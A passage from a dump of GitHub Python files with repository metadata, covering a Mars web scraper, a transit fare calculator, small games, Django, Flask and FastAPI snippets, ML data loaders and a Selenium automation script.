pd.read_html('https://galaxyfacts-mars.com')[0]\n df.columns=['Description', 'Mars', 'Earth']\n df.set_index('Description', inplace=True)\n mars_facts = df.to_html()\n\n # 1. Use browser to visit the URL \n url = 'https://marshemispheres.com/'\n\n browser.visit(url)\n hemispheressoup = soup(browser.html, 'html.parser')\n hemitems = hemispheressoup.find_all(\"div\", class_=\"item\")\n\n # 2. Create a list to hold the images and titles.\n hemisphere_image_urls = []\n\n # 3. Write code to retrieve the image urls and titles for each hemisphere.\n for hemitem in hemitems:\n hemidict = {}\n # hemitem = hemitems[0]\n hemidict[\"title\"] = hemitem.find(\"h3\").text \n hemilink = hemitem.find(\"a\") [\"href\"]\n hemilink = url + hemilink\n hemisphere_image_urls.append(hemidict)\n\n # for hemitem in hemisphere_image_urls:\n browser.visit(hemilink)\n hemispheressoup = soup(browser.html, 'html.parser')\n hemitems = hemispheressoup.find(\"img\", class_=\"wide-image\")\n hemidict[\"img_url\"]= url + hemitems[\"src\"]\n\n\n scraped_data = {\n \"news_title\": news_title,\n \"news_paragraph\": news_paragraph,\n \"featured_image\": featured_image,\n \"facts\": mars_facts,\n \"hemispheres\": hemisphere_image_urls,\n \"last_modified\": dt.datetime.now()\n }\n\n return scraped_data\n","repo_name":"OnyNwosu/Web-Scraping-Challenge","sub_path":"scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40774664721","text":"from day_journey import WeekdayJourney, WeekendJourney\r\nfrom constants import Fare, Capping, WEEKEND_DAYS\r\nfrom utils import get_date_time, get_week_number, get_day, get_time\r\n\r\n\r\nclass TigerCard:\r\n\r\n\tdef __init__(self):\r\n\t\tself._datetime = None\r\n\t\tself._week = None\r\n\t\tself._day = None\r\n\t\tself.current_fare = 0\r\n\t\tself.daily_fare = 0\r\n\t\tself.weekly_fare = 0\r\n\t\tself.total_fare = 0\r\n\r\n\tdef start_journey(self, datetime, from_zone, to_zone):\r\n\t\tself._set_initial_data(datetime, from_zone, to_zone)\r\n\t\tself.current_fare = self._get_calculated_fare()\r\n\t\tprint(f\"The fair calculated on {self._day} {self._time} from zone {from_zone} to zone {to_zone} is {self.current_fare} with daily fair {self.daily_fare}/{self.daily_capping} and weekly fair {self.weekly_fare}/{self.weekly_capping}\")\r\n\r\n\tdef _set_initial_data(self, datetime, from_zone, to_zone):\r\n\t\tself._datetime = get_date_time(datetime)\r\n\t\tself._set_unset_daily_fare()\r\n\t\tself._set_unset_weekly_fare()\r\n\t\tself._from_zone = from_zone\r\n\t\tself._to_zone = to_zone\r\n\t\tself._day = get_day(self._datetime)\r\n\t\tself._time = get_time(self._datetime)\r\n\t\tself._week = get_week_number(self._datetime)\r\n\r\n\tdef _set_unset_daily_fare(self):\r\n\t\tif self._week == get_week_number(self._datetime) and self._day != get_day(self._datetime):\r\n\t\t\tself.daily_fare = 0\r\n\r\n\tdef _set_unset_weekly_fare(self):\r\n\t\tif self._week != get_week_number(self._datetime):\r\n\t\t\tself.weekly_fare = 0\t\r\n\r\n\tdef _get_fare(self):\r\n\t\tif self._day in WEEKEND_DAYS:\r\n\t\t\twj = WeekendJourney(self._time, self._from_zone, self._to_zone)\r\n\t\telse:\t\t\t\t\r\n\t\t\twj = WeekdayJourney(self._time, self._from_zone, self._to_zone)\r\n\r\n\t\tfare = Fare.OFF_PEAK_HOURS if wj.is_off_peak_hours else Fare.PEAK_HOURS\r\n\t\treturn fare[self._from_zone - 1][self._to_zone - 1]\r\n\t\r\n\tdef _get_calculated_fare(self):\r\n\t\tfare = self._get_minimum_fare()\r\n\r\n\t\tself.weekly_fare += fare\r\n\t\tself.daily_fare += fare\r\n\t\tself.total_fare += fare\r\n\r\n\t\treturn fare\r\n\r\n\tdef _get_minimum_fare(self):\r\n\t\tmax_fare_for_weekly_capping = self.weekly_capping - self.weekly_fare\r\n\t\tmax_fare_for_daily_capping = self.daily_capping - self.daily_fare\r\n\r\n\t\tif max_fare_for_weekly_capping < max_fare_for_daily_capping:\r\n\t\t\tfare = self._calculate_fare(self.weekly_capping, self.weekly_fare)\r\n\t\telse:\r\n\t\t\tfare = self._calculate_fare(self.daily_capping, self.daily_fare)\r\n\r\n\t\treturn fare\r\n\t\t\r\n\t@property\r\n\tdef daily_capping(self):\r\n\t\treturn Capping.DAILY_CAPPING[self._from_zone - 1][self._to_zone - 1]\r\n\r\n\t@property\r\n\tdef weekly_capping(self):\r\n\t\treturn Capping.WEEKLY_CAPPING[self._from_zone - 1][self._to_zone - 1]\r\n\r\n\tdef _calculate_fare(self, capping, total_fare):\r\n\t\tif capping <= total_fare:\r\n\t\t\treturn 0\r\n\t\tfare = self._get_fare()\r\n\t\tif capping < total_fare + fare:\r\n\t\t\tfare = capping - total_fare\r\n\t\treturn fare\r\n\t\r\n\r\nif __name__ == \"__main__\": \r\n\r\n\ttc = TigerCard()\r\n\ttc.start_journey(datetime=\"08/02/2021 10:20\", from_zone=2, to_zone=1)\r\n\ttc.start_journey(datetime=\"08/02/2021 10:45\", from_zone=1, to_zone=1)\r\n\ttc.start_journey(datetime=\"08/02/2021 16:15\", from_zone=1, to_zone=1)\r\n\ttc.start_journey(datetime=\"08/02/2021 18:15\", from_zone=1, to_zone=1)\r\n\ttc.start_journey(datetime=\"08/02/2021 19:00\", from_zone=1, to_zone=2)\r\n","repo_name":"rupeshtare/sample","sub_path":"TigerCard/tiger_card.py","file_name":"tiger_card.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32122866143","text":"\"\"\"boomerang.py\n\nUsage:\n boomerang.py <archivo> --inicio=<inicio> --fin=<fin> [--resize=<resize>]\n\nOptions:\n -h --help Show this screen.\n\"\"\"\n\nfrom moviepy.editor import VideoFileClip, concatenate_videoclips, vfx\n\ndef boomerang(archivo, inicio, fin, resize=None):\n v= VideoFileClip(archivo) #carga el arcivo de video como un objeto de moviepy \n v2= v.subclip(inicio, fin) #recorta la porcion que intereza \n v3= v2.fx(vfx.time_mirror) #hace una version \"reversa\" de v2\n v4= concatenate_videoclips([v2,v3]) #concatena v1 y v2\n\n if resize:\n v4 = v4.resize(resize)\n \n gif = archivo[0:-4] + '.gif' #crea el nombre de archivo de salida\n print('guardando ' + gif)\n v4.write_gif(gif) #guarda el archivo resultante como gif\n\n\nif __name__ == '__main__':\n from docopt import docopt\n argumentos = docopt(__doc__)\n archivo = argumentos['<archivo>']\n inicio = float(argumentos['--inicio'])\n fin = float(argumentos['--fin'])\n resize = float(argumentos['--resize'])\n print (boomerang(archivo, inicio, fin, resize))\n","repo_name":"Jonatanavila/test","sub_path":"boomerang.py","file_name":"boomerang.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11421890440","text":"from django import forms\nfrom .models import Monster, LeaderboardEntry\n\nclass MonsterGuessForm(forms.Form):\n guess = forms.CharField(label=\"Your guess\", max_length=255)\n\nclass LeaderboardEntryForm(forms.ModelForm):\n class Meta:\n model = LeaderboardEntry\n fields = ['player_name']\n \nclass PlayerNameForm(forms.Form):\n player_name = forms.CharField(label='Your Name', max_length=100)\n \n \nclass GameChoiceForm(forms.Form):\n GAME_CHOICES = [\n ('ragnarok_monsters', 'Ragnarok Online Monsters', 'https://playragnarokonlinebr.com/img/logo.png'),\n ('pokemon', 'Pokemon', 'https://logospng.org/download/pokemon/pokemon-4096.png'),\n ]\n\n game = forms.ChoiceField(choices=[(game[0], game[1]) for game in GAME_CHOICES], widget=forms.RadioSelect, initial='ragnarok_monsters')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.games = [\n ('ragnarok_monsters', 'Ragnarok Online', 'https://c-cl.cdn.smule.com/rs-s27/arr/10/5a/4740a56f-e57d-4922-8217-07e0c575377c.jpg'),\n ('pokemon', 'Pokemon', 'https://logospng.org/download/pokemon/pokemon-256.png'),\n ]\n self.fields['game'].choices = [(game[0], game[1]) for game in self.GAME_CHOICES]\n print(self.fields['game'].choices)\n for game in self.fields['game'].choices:\n print(game)\n\n self.choice_images = {}\n for game in self.fields['game'].choices:\n self.choice_images[game[0]] = self.get_image_url(game[0])\n @staticmethod\n def get_image_url(game_id):\n for game in GameChoiceForm.GAME_CHOICES:\n if game[0] == game_id:\n return game[2]\n return None","repo_name":"jfsjunqueira/ragnarok-disguise","sub_path":"game/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"30996756824","text":"# 数据读取\nimport cv2\nfrom ImagePathLabels import get_annotations, get_insect_names\nimport numpy as np\nfrom PIL import Image, ImageEnhance\nimport random\n\nTRAINDIR = '/home/marco/Datasets/Paddle/insects/train'\nTESTDIR = '/home/marco/Datasets/Paddle/insects/test'\nVALIDDIR = '/home/marco/Datasets/Paddle/insects/val'\n\ndef get_bbox(gt_bbox, gt_class):\n # 对于一般的检测任务来说,一张图片上往往会有多个目标物体\n # 设置参数MAX_NUM = 50, 即一张图片最多取50个真实框;如果真实\n # 框的数目少于50个,则将不足部分的gt_bbox, gt_class和gt_score的各项数值全设置为0\n MAX_NUM = 50\n gt_bbox2 = np.zeros((MAX_NUM, 4))\n gt_class2 = np.zeros((MAX_NUM,))\n for i in range(len(gt_bbox)):\n gt_bbox2[i, :] = gt_bbox[i, :]\n gt_class2[i] = gt_class[i]\n if i >= MAX_NUM:\n break\n return gt_bbox2, gt_class2\n\ndef get_img_data_from_file(record):\n \"\"\"\n record is a dict as following,\n record = {\n 'im_file': img_file,\n 'im_id': im_id,\n 'h': im_h,\n 'w': im_w,\n 'is_crowd': is_crowd,\n 'gt_class': gt_class,\n 'gt_bbox': gt_bbox,\n 'gt_poly': [],\n 'difficult': difficult\n }\n \"\"\"\n im_file = record['im_file']\n h = record['h']\n w = record['w']\n is_crowd = record['is_crowd']\n gt_class = record['gt_class']\n gt_bbox = record['gt_bbox']\n difficult = record['difficult']\n\n img = cv2.imread(im_file)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # check if h and w in record equals that read from img\n assert img.shape[0] == int(h), \\\n \"image height of {} inconsistent in record({}) and img file({})\".format(\n im_file, h, img.shape[0])\n\n assert img.shape[1] == int(w), \\\n \"image width of {} inconsistent in record({}) and img file({})\".format(\n im_file, w, img.shape[1])\n\n gt_boxes, gt_labels = get_bbox(gt_bbox, gt_class)\n\n # gt_bbox 用相对值\n gt_boxes[:, 0] = gt_boxes[:, 0] / float(w)\n gt_boxes[:, 1] = gt_boxes[:, 1] / float(h)\n gt_boxes[:, 2] = gt_boxes[:, 2] / float(w)\n gt_boxes[:, 3] = gt_boxes[:, 3] / float(h)\n \n return img, gt_boxes, gt_labels, (h, w)\n\n\ncname2cid = get_insect_names()\nprint(\"cname2cid:\", cname2cid)\nrecords = get_annotations(cname2cid, TRAINDIR)\nprint(\"len(records):\", len(records))\nprint(\"records[0]:\", records[0])\n\n\nrecord = records[0]\nimg, gt_boxes, gt_labels, scales = get_img_data_from_file(record)\nprint(\"img.shape:\", img.shape)\nprint(\"gt_boxes.shape:\", gt_boxes.shape)\nprint(\"gt_labels:\", gt_labels)\nprint(\"scales:\", scales)\n\n# get_img_data_from_file()函数可以返回图片数据的数据,它们是图像数据img,\n# 真实框坐标gt_boxes,真实框包含的物体类别gt_labels,图像尺寸scales。\n\n","repo_name":"LiuXiang199x/Estudiar","sub_path":"Paddle/project/yolo_DetectPests/src/ReadPreprocessImg.py","file_name":"ReadPreprocessImg.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"72984637111","text":"import torch\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport random\n\nnp.random.seed(2022)\n\n\ndef continue_show_slice(curr_slice, size, show_slice):\n if show_slice is None: return False\n if show_slice < 0: show_slice = show_slice + size\n if curr_slice == show_slice:\n return True\n else:\n return False\n\n\ndef discrete_missing(data, proportions=(0.75, 0.75, 0.75), directions=('iline', 'xline', 'tline'),\n mask=None, show_slices=(None, None, None), random_seed=2022):\n assert len(proportions) == len(directions) == len(show_slices)\n assert set(directions).issubset({'iline', 'xline', 'tline'})\n random.seed(random_seed)\n d_dict = dict(zip(directions, proportions))\n d_show_slice = dict(zip(directions, show_slices))\n if mask is None: mask = np.ones_like(data)\n size = data.shape\n for direction in directions:\n proportion = d_dict[direction]\n show_slice = d_show_slice[direction]\n print(f'{direction} random discrete missing proportion: {proportion * 100}%')\n if direction == 'iline':\n sample = random.sample(range(1, size[2]), int((size[2] - 1) * proportion))\n for i in sample:\n if continue_show_slice(i, size[2], show_slice): continue\n mask[:, :, i] = 0\n elif direction == 'xline':\n sample = random.sample(range(1, size[1]), int((size[1] - 1) * proportion))\n for i in sample:\n if continue_show_slice(i, size[1], show_slice): continue\n mask[:, i, :] = 0\n else:\n sample = random.sample(range(1, size[0]), int((size[0] - 1) * proportion))\n for i in sample:\n if continue_show_slice(i, size[0], show_slice): continue\n mask[i, :, :] = 0\n return mask\n\n\ndef continuous_missing(data, num_traces=(50, 50, 50), directions=('iline', 'xline', 'tline'),\n start_missing=(20, 20, 20), mask=None):\n assert len(num_traces) == len(directions)\n assert len(num_traces) == len(start_missing)\n assert set(directions).issubset({'iline', 'xline', 'tline'})\n if mask == None: mask = np.ones_like(data)\n size = data.shape\n start_dict = dict(zip(directions, start_missing))\n traces_dict = dict(zip(directions, num_traces))\n for direction in directions:\n start = start_dict[direction]\n trace = traces_dict[direction]\n print(f'{direction} continuous missing traces: {trace}, missing start trace {start}')\n if direction == 'iline':\n assert start < size[2]\n mask[:, :, start:start + trace] = 0\n elif direction == 'xline':\n assert start < size[1]\n mask[:, start:start + trace, :] = 0\n else:\n assert start < size[0]\n mask[start:start + trace, :, :] = 0\n return mask\n\n\ndef normalization(data):\n _range = np.max(data) - np.min(data)\n return (data - np.min(data)) / _range\n\n\ndef normalization_tensor(data):\n _range = torch.max(data) - torch.min(data)\n return (data - torch.min(data)) / _range\n\n\ndef z_score_clip(data):\n z = (data - np.mean(data)) / np.std(data)\n return normalization(np.clip(z, a_min=-3.8, a_max=3.8))\n\n\ndef prediction(model, data, device):\n model.eval()\n data = normalization(data)\n m1, m2, m3 = data.shape\n c1 = (np.ceil(m1 / 16) * 16).astype(np.int)\n c2 = (np.ceil(m2 / 16) * 16).astype(np.int)\n c3 = (np.ceil(m3 / 16) * 16).astype(np.int)\n input_tensor = np.zeros((c1, c2, c3), dtype=np.float32) + 0.5\n input_tensor[:m1, :m2, :m3] = data\n input_tensor = torch.from_numpy(input_tensor)[None, None, :, :, :].to(device)\n if device.type == 'cpu':\n input_tensor = input_tensor.float()\n else:\n input_tensor = input_tensor.half()\n with torch.no_grad():\n result = model(input_tensor).cpu().numpy()[0, 0, :m1, :m2, :m3]\n return result.astype(np.float32)\n\n\ndef get_pseudo_color_img(org_slice, masked_slice, filled_slices):\n org_slice = plt.get_cmap('seismic')(org_slice)[:, :, :-1]\n masked_slice = plt.get_cmap('seismic')(masked_slice)[:, :, :-1]\n filled_slices = plt.get_cmap('seismic')(filled_slices)[:, :, :-1]\n return org_slice, masked_slice, filled_slices\n\n\ndef calculate_missing_ratio(mask):\n nomasked = np.sum((mask == 1).astype(np.float32))\n masked = np.sum((mask == 0).astype(np.float32))\n return masked / (nomasked + masked)\n\n\nif __name__=='__main__':\n #mask = discrete_missing(np.random.normal(size = (192, 64, 240)), proportions=(0.5,), directions=('iline',), show_slices=(-16,))\n mask = continuous_missing(np.random.normal(size = (192, 64, 240)), num_traces=(40,), directions=('iline',), start_missing=(100,))","repo_name":"douyimin/MDA_GAN","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"95"} +{"seq_id":"32034965087","text":"\"\"\"Routes for card\"\"\"\n\nfrom fastapi import APIRouter\n\ncard_router = APIRouter()\n\n\n@card_router.get(\"/\", status_code=200)\nasync def get_all_by_collection(user_id: str, collection_id: str):\n \"\"\"Route for getting all cards by collection_id\"\"\"\n\n return {\n \"userId\": user_id,\n \"collectionId\": collection_id\n }\n\n\n@card_router.get(\"/{card_id}\", status_code=200)\nasync def get_by_id(user_id: str, collection_id: str, card_id: str):\n \"\"\"Route for getting card by card_id\"\"\"\n\n return {\n \"userId\": user_id,\n \"collectionId\": collection_id,\n \"cardId\": card_id\n }\n\n\n@card_router.post(\"/\", status_code=201)\nasync def create():\n \"\"\"Create one or multiple cards\"\"\"\n\n return {\n \"message\": \"success!\"\n }\n","repo_name":"joebrentnall25/flash-card-api","sub_path":"src/api/routes/card_routes.py","file_name":"card_routes.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72541917113","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, SimpleRNN\n\n# Data setting\nx = np.array([[1,2,3],[2,3,4],[3,4,5],[4,5,6]])\ny = np.array([4,5,6,7])\n\nx = x.reshape(4, 3, 1)\n\n# Modeling\nmodel = Sequential()\nmodel.add(SimpleRNN(units=10, input_shape=(3, 1)))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(Dense(1))\n\nmodel.summary()\n\n# Compilation & Training\nmodel.compile(loss='mse', optimizer='adam')\nmodel.fit(x, y, epochs=800, batch_size=3)\n\n# Prediction\nresult = model.predict(np.array([[[5],[6],[7]]]))\nprint(f'prediction for [5 6 7]: {result}')\n# prediction for [5 6 7]: [[7.3158984]]","repo_name":"estela-park/AI_BitCamp","sub_path":"Keras_Modelling/keras34_RNN1.py","file_name":"keras34_RNN1.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8387199303","text":"from src.modules.dosage.model import Dosage\nfrom src.modules.medicine.model import Medicine\nfrom src.utils.logger import logger\nfrom src.utils.response import controller_resp\n\n\ndef get_dosages():\n\ttry:\n\t\tdosages = Dosage.get()\n\t\treturn controller_resp(200, dosages, \"Dosages Fetched\")\n\texcept Exception as excp:\n\t\tlogger.error('Dosage::get_dosage %s', excp)\n\t\treturn controller_resp(500, None, \"Something went wrong\")\n\ndef get_dosage_byId(id):\n\ttry:\n\t\tdosage = Dosage.get_by_id(id)\n\t\tstatus_code = 200 if dosage else 404\n\t\tmessage = \"Dosage Fetched\" if dosage else \"Dosage Not Found\"\n\t\treturn controller_resp(status_code, dosage, message)\n\texcept Exception as excp:\n\t\tlogger.error('Dosage::get_dosage %s', excp)\n\t\treturn controller_resp(500, None, \"Something went wrong\")\n\ndef __getMed_create_dosage(med, dose_data):\n\tnew_dosage = Dosage.create(data=dose_data, med=med)\n\tfin_dosage = Dosage.set_enddate(dosage=new_dosage)\n\treturn fin_dosage\n\ndef create_dosage(data):\n\ttry:\n\t\tfound_med = Medicine.get_by_id(data[\"medicine\"])\n\t\tif (not found_med):\n\t\t\treturn controller_resp(404, {}, \"Medicine not found\")\n\t\tcreated_dosage = __getMed_create_dosage(found_med, dose_data=data)\n\t\treturn controller_resp(201, created_dosage, \"Dosage Created\")\n\texcept Exception as excp:\n\t\tlogger.error('Dosage::create_dosage %s', excp)\n\t\treturn controller_resp(500, None, 'Something went wrong')\n\ndef create_medicine_dosage(data):\n\ttry:\n\t\tnew_medicine = Medicine.create(data=data[\"medicine\"])\n\t\tcreated_dosage = __getMed_create_dosage(new_medicine, dose_data=data)\n\t\treturn controller_resp(201, created_dosage, \"Dosage & Medicine Created\")\n\texcept Exception as excp:\n\t\tlogger.error('Dosage::create_dosage %s', excp)\n\t\treturn controller_resp(500, None, 'Something went wrong')\n","repo_name":"torredefarol24/flask_mongo","sub_path":"src/modules/dosage/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12148825417","text":"\"\"\"\nProject : \nAuthor : Ajeet\nDate : June 9, 2023\n\"\"\"\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\n\n\ndriver = webdriver.Chrome()\ndriver.get('https://usa.visa.com/support/consumer/travel-support/exchange-rate-calculator.html')\nwait = WebDriverWait(driver, 30)\n\n# click to Accept\nwait.until(EC.element_to_be_clickable((By.XPATH, \"//a[text()='Accept']\"))).click()\n\nshadow_root = driver.find_element(By.XPATH, \"//dm-calculator\").shadow_root\n# enter_amount\nshadow_root.find_element(By.ID, \"input_amount_paid\").send_keys(\"1\")\n\n# from_dropdown\nshadow_root.find_element(By.ID, \"autosuggestinput_from\").click()\nshadow_root.find_element(By.ID, \"listbox-item-157\").click()\n\n# to_dropdown\nshadow_root.find_element(By.ID, \"autosuggestinput_to\").click()\nshadow_root.find_element(By.ID, \"listbox-item-0\").click()\n\n# fee_edit\nshadow_root.find_element(By.CLASS_NAME, 'vs-link-cta.vs-calculator-edit-link').click()\n\nbank_rate = to_dropdown = shadow_root.find_element(By.ID, \"input_bank_rate\")\nbank_rate.send_keys(Keys.CONTROL, 'a')\nbank_rate.send_keys(Keys.BACKSPACE)\nbank_rate.send_keys('0')\n\n# clicks on Calculate Conversion button\nshadow_root.find_elements(By.CSS_SELECTOR, 'div.vs-container')[-1].find_elements(By.TAG_NAME, 'button')[0].click()\nsleep(2)\n\n\n","repo_name":"ajeet214/Web_Scraping_with_Selenium","sub_path":"usa_visa_com.py","file_name":"usa_visa_com.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"36786145231","text":"#------------------------------------------------------------------------\n#\n# Battleships\n#\n#------------------------------------------------------------------------\n\nimport random\n\nclass Grid():\n\n def __init__(self):\n self.game_grid = []\n self.player_view_grid = []\n self.grid_size = 10\n self.grid_rank = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J']\n\n def init_grid(self):\n\n for gridY in range(self.grid_size):\n grid_row = []\n\n for gridX in range(self.grid_size):\n grid_row.append(' - ')\n\n self.game_grid.append(grid_row)\n\n def print_grid(self):\n print(' 1 2 3 4 5 6 7 8 9 10')\n\n for gridX in range(len(self.game_grid)):\n print(self.grid_rank[gridX], end='')\n\n for gridY in range(len(self.game_grid)):\n print(self.game_grid[gridX][gridY], end='')\n\n print('')\n\n def print_player_view_grid(self):\n print(' 1 2 3 4 5 6 7 8 9 10')\n\n for gridX in range(len(self.player_view_grid)):\n print(self.grid_rank[gridX], end='')\n\n for gridY in range(len(self.player_view_grid)):\n print(self.player_view_grid[gridX][gridY], end='')\n\n print('')\n\n\nclass Ship():\n\n def __init__(self):\n self.ships = [5, 4, 3, 3, 2, 2]\n\n def max_random_place(self, grid_size, ship_length):\n return random.randrange(0, (grid_size - ship_length))\n\n def random_x_or_y(self):\n x_or_y = random.randint(0, 1)\n if x_or_y == 0:\n return 'x'\n return 'y'\n\n def place_ships(self, grid):\n grid_length = len(grid)\n\n for ship in self.ships:\n\n for n in range(10000):\n print('n: ',n)\n\n randomXY = self.random_x_or_y()\n random_grid_space = random.randrange(grid_length)\n start_point = self.max_random_place(grid_length, ship)\n\n if randomXY == 'y':\n spaces_free = True\n\n # checks spaces are free and that there is a space gap on same axis\n for ship_square in range(ship + 1):\n square = grid[start_point + ship_square][random_grid_space]\n if square != ' - ':\n spaces_free = False\n\n if spaces_free:\n for ship_square in range(ship):\n grid[start_point + ship_square][random_grid_space] = ' S' + str(ship)\n\n elif spaces_free == False:\n continue\n\n break\n\n\n if randomXY == 'x':\n spaces_free = True\n\n # checks spaces are free and that there is a space gap on same axis\n for ship_square in range(ship + 1):\n square = grid[random_grid_space][start_point + ship_square]\n if square != ' - ':\n spaces_free = False\n\n if spaces_free:\n for ship_square in range(ship):\n grid[random_grid_space][start_point + ship_square] = ' S' + str(ship)\n\n elif spaces_free == False:\n continue\n\n break\n\n\n\n\n\n\n\n\n\n\n\ngame = Grid()\nship = Ship()\ngame.init_grid()\ngame.player_view_grid = list(game.game_grid)\n\n\nprint('player view')\ngame.print_player_view_grid()\n\n#ship.place_ships(game.game_grid)\ngame.game_grid[0][0] = ' D '\ngame.player_view_grid[0][1]= ' H '\nprint('player view')\ngame.print_player_view_grid()\nprint('game view')\ngame.print_grid()\nprint('player view')\ngame.print_player_view_grid()\nprint(game.david)","repo_name":"Davidprogramming1986/Battleships","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"39637927211","text":"def fecha_dia_siguiente(anio, mes, dia):\r\n bisiesto = False\r\n\r\n if anio % 400 == 0:\r\n bisiesto = True\r\n elif anio % 4 == 0:\r\n bisiesto = True\r\n\r\n if mes in (1, 3, 5, 7, 8, 10, 12):\r\n dias_mes = 31\r\n elif mes == 2:\r\n if bisiesto:\r\n dias_mes = 29\r\n else:\r\n dias_mes = 28\r\n else:\r\n dias_mes = 30\r\n if dia < dias_mes:\r\n dia += 1\r\n else:\r\n dia = 1\r\n if mes == 12:\r\n mes = 1\r\n anio += 1\r\n else:\r\n mes += 1\r\n return (anio, mes, dia)\r\n\r\nprint(fecha_dia_siguiente(2020, 12, 30))","repo_name":"gmsmartinez/Python","sub_path":"DIAGRAMACION2/ejercicio12.py","file_name":"ejercicio12.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74414347511","text":"# 1로 만들기\n\"\"\"\n먼저 Tree형식이라고 생각했을 때,\n가능한 모든 경우를 search하지만\n현재 cnt가 지금까지 나온 최소 cnt보다 같거나 큰 경우 (즉, 더 깊이 들어가는 경우) 종료\n-> 약간 가지치기 느낌\n현재 cnt가 작은 경우에서 1이 나오면 min_cnt 변경\n이런 식으로 serach.\n\"\"\"\ndef calc(X, cnt):\n global min_cnt\n if cnt >= min_cnt: return\n if X == 1:\n min_cnt = cnt\n return\n if X % 3 == 0: calc(X // 3, cnt + 1)\n if X % 2 == 0: calc(X // 2, cnt + 1)\n calc(X - 1, cnt + 1)\n\ndef solution():\n X = int(input())\n global min_cnt\n min_cnt = X\n calc(X, 0)\n print(min_cnt)\n\nsolution()\n","repo_name":"bob8dod/Preparing_CodingTest","sub_path":"BaekJoon/#1463.py","file_name":"#1463.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"69953143674","text":"from turtle import Turtle, Screen\r\nfrom paddle import Paddle\r\nfrom brick import Brick\r\nfrom margin import MarginMaker\r\nfrom ball import Ball\r\nimport time\r\nfrom score import Score\r\n\r\nWIDTH = 800\r\nHEIGHT = 600\r\n\r\nwindow = Screen()\r\nwindow.setup(width=WIDTH, height=HEIGHT)\r\nwindow.title('Breakout')\r\nwindow.bgcolor('black')\r\nwindow.tracer(0) # Set animation delay to 0\r\n\r\nmargin = MarginMaker(WIDTH, HEIGHT)\r\n\r\npad = Paddle(WIDTH)\r\n\r\nwindow.listen()\r\nwindow.onkeypress(pad.left, \"Left\")\r\nwindow.onkeypress(pad.right, \"Right\")\r\n\r\nbricks = Brick(WIDTH, HEIGHT)\r\nbricks.bake_bricks()\r\n\r\nball = Ball()\r\nball.start(pad.xcor(), pad.ycor()+20)\r\nheart = Score()\r\n\r\nloop = True\r\n\r\nwhile loop:\r\n time.sleep(ball.speed)\r\n# time.sleep(.3)\r\n ball.move()\r\n\r\n visible_br = []\r\n for br in bricks.br_list:\r\n # brick collision\r\n if br[0].isvisible():\r\n visible_br.append(br)\r\n if 10 < ball.distance(br[0]) < 35:\r\n bricks.brick_process(index=bricks.br_list.index(br))\r\n ball.horizontal_collision()\r\n # Win Mechanism\r\n if len(visible_br) == 0:\r\n heart.lose_win(\"Hooray \\n You Won!\")\r\n loop = False\r\n\r\n # vertical wall collision\r\n if ball.xcor() >= 360 or ball.xcor() <= -360:\r\n ball.vertical_collision()\r\n\r\n # ceiling collision\r\n if ball.ycor() >= 260:\r\n ball.horizontal_collision()\r\n\r\n # Pad collision\r\n if ball.distance(pad) < 50 and -250 < ball.ycor() < -230:\r\n ball.horizontal_collision()\r\n # ball miss and losing mechanism\r\n elif ball.ycor() < -400:\r\n ball.start(pad.xcor(), pad.ycor()+20)\r\n hearts_num = heart.miss()\r\n if hearts_num == 0:\r\n bricks.clear()\r\n heart.lose_win(\"Game Over\")\r\n loop = False\r\n\r\n window.update() # Update the screen after each frame\r\n\r\n\r\nwindow.mainloop()\r\n","repo_name":"Id-Dark-Dragon/Python-Mini-Games","sub_path":"2-Breakout/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34109495707","text":"import unittest\n\nfrom yabc import transaction\nfrom yabc.formats import coinbasettr\n\n\nclass CoinbaseTTRCsvTest(unittest.TestCase):\n def setUp(self) -> None:\n self.filename = \"testdata/coinbase/UsTaxTransactionsReport.csv\"\n\n def test_load_coinbasettr(self):\n \"\"\" Test that loading does not raise\n \"\"\"\n with open(self.filename) as f:\n 